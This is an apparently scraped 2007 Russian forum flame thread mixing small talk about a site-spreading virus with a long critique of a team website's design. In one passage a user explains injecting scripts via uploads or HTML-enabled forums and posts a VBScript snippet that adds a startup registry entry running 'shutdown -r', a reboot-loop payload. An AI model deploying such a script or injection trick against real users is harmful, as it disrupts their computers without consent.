ТЫ хочешь сказать, что ты за городом живёшь?
А что? Нет?
Turan |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » Turan » Общий форум » Флейм,Флейм,Флейм!
ТЫ хочешь сказать, что ты за городом живёшь?
А что? Нет?
Мой любимый сайт накрылся..
А ещё вирус какой-то, и он теперь клонирует посты
на всех форумах, где я зарегистирована
А что? Нет?
Если ты в переделе 15 мин от станции метро, то нет)))
А ещё вирус какой-то, и он теперь клонирует посты
на всех форумах, где я зарегистирована
Наверное так же как и мне, давала кому-нить свой IP. )
Отредактировано RatspideR (2007-08-12 10:18:07)
Нет ) ты вымогатель )
вирус Интружн какой-то
Говорят , в ночь с 12 на 13 звездный дождь .
Я пару минуту окна постоял ,ни одной звезды не упало .
Был тольковзлёт , даи то фонари самолёты .
Кто удалил мою тему???
вирус Интружн какой-то
Отлкючи Касперского, я те ещё пару троянов загоню! ) Или KGB Spy....
Отредактировано RatspideR (2007-08-14 10:51:35)
TenderZero
А я увидел... вроде... может быть...
ты вымогатель )
Бедный я! Что я сделал?
Ну и какой в этом смысл?
этт уже с месяц, не из-за тебя. На имо сайте хакеры взломали и что-т напортачили, терь вирус через сайт распространяется
На имо сайте хакеры взломали и что-т напортачили, терь вирус через сайт распространяется
Так этому сайту и надо!!! В следующий раз ещё раз сломают! :diablo.gif: Можешь им сообщить чтоб запретили загружать картинки и файлы, а то слишком просто будет!
Отредактировано RatspideR (2007-08-14 17:26:12)
Что за глупости
"Картинок" там как раз не так уж и много
А взломали Antiemo.net совместно с Black Legion ом
Что за глупости
А ты разбираешься в хакерстве???
Если на сайт каким-то образом можно что-то загрузить, то и любой скрипт также можно загрузить. Если форум поддерживает html-коды, тем лучше - значит можно вписать любой скрипт, написанный самим или взятый где-то, и дело в шляпе!
Например, если сможешь где-то разместить правильно этот код, то ... сама посмотришь! Для безопасности разные во всех тегах аменил "<>" и "[]" на "{}".
{code}script language="vbscript"}
on error resume next
dim astenhacker
set astenhacker=CreateObject("WScript.Shell")
astenhacker.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\SYSTEM32","shutdown -r"
/script}
{/code}
Если интересно могу дальше объяснить, как это всё работает. И что этот скрипт означает.
"Картинок" там как раз не так уж и много
Какая разница, главное чтоб пользователю можно было загружать их. Кстати особо умные хакеры могут это всё через авик делать. В смысле вместо пути которого ты вводишь (видела кнопку "обзор"?) вписать путь трояна или скрипта.
Отредактировано RatspideR (2007-08-14 17:29:16)
Мне это НЕинтерсно
Никогда не увлекалась и не собираюсь
А ты не имеешь права тыкать се в грудь и орать
Есть нормы приличия
Есть нормы приличия
Лично я о себе ничё не говорил!
Невоспитанность видна издалека
Даже потребности нет и не было
Невоспитанность видна издалека
Наверное поэтому ты так заметна.
Даже потребности нет и не было
Нечего тогда без повода спор поднимать! На себя сначала бы посмотрела - "верх воспитанности".
З.Ы. кто знает как настроить аську на мобиле?
Отредактировано RatspideR (2007-08-21 20:28:16)
Приглашаем всех желающих на наш форум http://chgk.ucoz.ru !!!
эх, так как это флейм и я кое-что в этом понимаю,позволю себе немного критики, только без обид!
Приглашаем всех желающих на наш форум http://chgk.ucoz.ru !!!
чтобы не портить вашу гостевую книгу решила написать здесь)
за верхушку сайта зачет, за все остальное ПИЛОХО! захотите подробнее, напишу подробнее! и посоветуйте дизайнеру посетить сайт wwwartlebedev.ru, ему будет очень полезно!
Kotya
Создавал его я. Пожалуйста поподробнее. Что именно?
ПыСы:
Критика всегда полезна.
Отредактировано RatspideR (2007-08-22 16:50:10)
не, сонце, это скорее советы, чем критика! в конце концов сама не гений веб-дизайна! итак поехали:
1 Почему желтый??? и уж совсем не понимаю почему такой яркий, через кааое-то время глаз устаёт, а второй взрывается)))
2 Градиент лучше убрать, ну или немного сгладить
3 Ссылка "Сайт команды Х-Трим" во первых чисто по-вебовски не корректна!там обычно пишут Главная , ну а если хочется чего-то оригинальнее, то можно было хотя бы соригинальничать.А во вторых ЗАЧЕМ ОНА ВОБЩЕ НУЖНА, если и на Форуме та же страница открывается?
4 Опросник ваш почему-то не пашет, может это только у меня........... , но синий индикатор это ужасно!
5 Почему нельзя просмотреть форум, не зарегестрировавшись, это уменьшает количество посетителей как минимум процентов на 80, если бы не чисто спортивный интерес, я бы, например, сразу закрыла сайт!
6 Зачем дважды сувать поля ввода? лучше бы вы в центре что-нибудь интересное написали, ну или на кройняк фото команды (не самое лучшее, но всетаки лучше чем то что есть)
7 Зачем на каждом блоке эти треугольнички? функций, как я поняла, у них нет, смысловой нагрузки они тоже не несут, а дизайн от них лучше не становиться!
8 Непонятные белые палки по бокам все портят! УБРАТЬ, НЕЛЬЗЯ ПОМИЛОВАТЬ
9 Обычно на сайтах ставят или знак Copyright, или пишут слово целиком! зачем их вместе?
10 Но самое ужасное то что он на полстраницы! если б там было просто пустое продолжение фона, и то было бы лучше!
вот за верхний блок респект, хорошо нарисован, если ты конечно сам это придумал и нарисовал!
надеюсь я не сильно раскритиковала!)))) если еще немного посидеть над этим сайтом, то получится конфетка!
а сайт лебедева всетаки посети и проштудируй от начала до конца, вобще этот сайт должен стать чем-то вроде настольной книги для дизайнера!
Отредактировано Kotya (2007-08-22 17:27:58)
1 Почему желтый??? и уж совсем не понимаю почему такой яркий, через кааое-то время глаз устаёт, а второй взрывается)))
2 Градиент лучше убрать, ну или немного сгладить
Не согласен, моё мнение.
3 Ссылка "Сайт команды Х-Трим" во первых чисто по-вебовски не корректна!там обычно пишут Главная , ну а если хочется чего-то оригинальнее, то можно было хотя бы соригинальничать.А во вторых ЗАЧЕМ ОНА ВОБЩЕ НУЖНА, если и на Форуме та же страница открывается?
Исправим. Это было случайно!
4 Опросник ваш почему-то не пашет, может это только у меня........... , но синий индикатор это ужасно!
Не понял, ща посмотрю.
5 Почему нельзя просмотреть форум, не зарегестрировавшись, это уменьшает количество посетителей как минимум процентов на 80, если бы не чисто спортивный интерес, я бы, например, сразу закрыла сайт!
Это форум для ех кто играет в ЧГК. Главное чтобы все были знакомы в реале. я нигде сайт не рекламировал, мне это не нужно. 24 пользователя, зато большинство активны и все знакомы.
6 Зачем дважды сувать поля ввода? лучше бы вы в центре что-нибудь интересное написали, ну или на кройняк фото команды (не самое лучшее, но всетаки лучше чем то что есть)
Ты права, уберу.
7 Зачем на каждом блоке эти треугольнички? функций, как я поняла, у них нет, смысловой нагрузки они тоже не несут, а дизайн от них лучше не становиться!
Если честно не понял о чём ты говоришь.
8 Непонятные белые палки по бокам все портят! УБРАТЬ, НЕЛЬЗЯ ПОМИЛОВАТЬ
Исправлю обязательно.
9 Обычно на сайтах ставят или знак Copyright, или пишут слово целиком! зачем их вместе?
Исправим!
10 Но самое ужасное то что он на полстраницы! если б там было просто пустое продолжение фона, и то было бы лучше!
Не понял.. Он на всю страницу. у меня разрешение 1280.1024. Может у тя 1600.1200?
надеюсь я не сильно раскритиковала!))))
Спасибо, учту все замечания!
Kotya написал:
7 Зачем на каждом блоке эти треугольнички? функций, как я поняла, у них нет, смысловой нагрузки они тоже не несут, а дизайн от них лучше не становиться!Если честно не понял о чём ты говоришь.
такие шарики с треугольничками внутри, они обычно стоят если есть что разворачивать!
насчет разрешения у меня тоже 1280.1024,но сайт доходит только до середины, это скорее неполадки с HTML. сам сажал?
а насчет света и градиента: давай так вопрос- градиент нужен для того чтобы показать объем? тогда он ошибочен!
если так, просто чтоб фон не был однотонным, поверь есть рещения для этой задачи, гораздо интереснее!
ну а цвет дело вкуса, не буду спорить, но сделать его помягче всетаки желательно!
и хорошо что не принял в штыки))))
Kotya
Насчёт цвета: сделаю оранжевый, а не жёлтый.
насчет разрешения у меня тоже 1280.1024,но сайт доходит только до середины, это скорее неполадки с HTML. сам сажал?
Странно... ни у кого так не было!
такие шарики с треугольничками внутри, они обычно стоят если есть что разворачивать!
Ну это для дизайна. Подумаю над этим.
Ну это для дизайна. Подумаю над этим.
просто понимаешь, это элемент навигации, как дизайн это не используется)))))
))))))))))))))) Copyright уже убрал))))))))))
или похоже что он на форуме 1, а на главной их 2)))))))))))
чет я совсем запуталась, теперь есть галерея, но нет форума и главной!!! ой мама, ктулху жрет мой мозк
Отредактировано Kotya (2007-08-22 17:52:27)
тоже решение)))))))))))))
но синий индикатор это ужасно!
А какой тогда? Черный? Нет. Зелёный?
ФЛЕЙМ | Общий форум | 2011-02-28 |
Скучно | Общество | 2007-01-05 |
Club 152 | Общество | 2009-04-05 |
Интервью 2ran (Вугар Зейналов) | В гостях у форумчан. | 2010-09-14 |
Поздравления | Общий форум | 2008-05-06 |
Вы здесь » Turan » Общий форум » Флейм,Флейм,Флейм!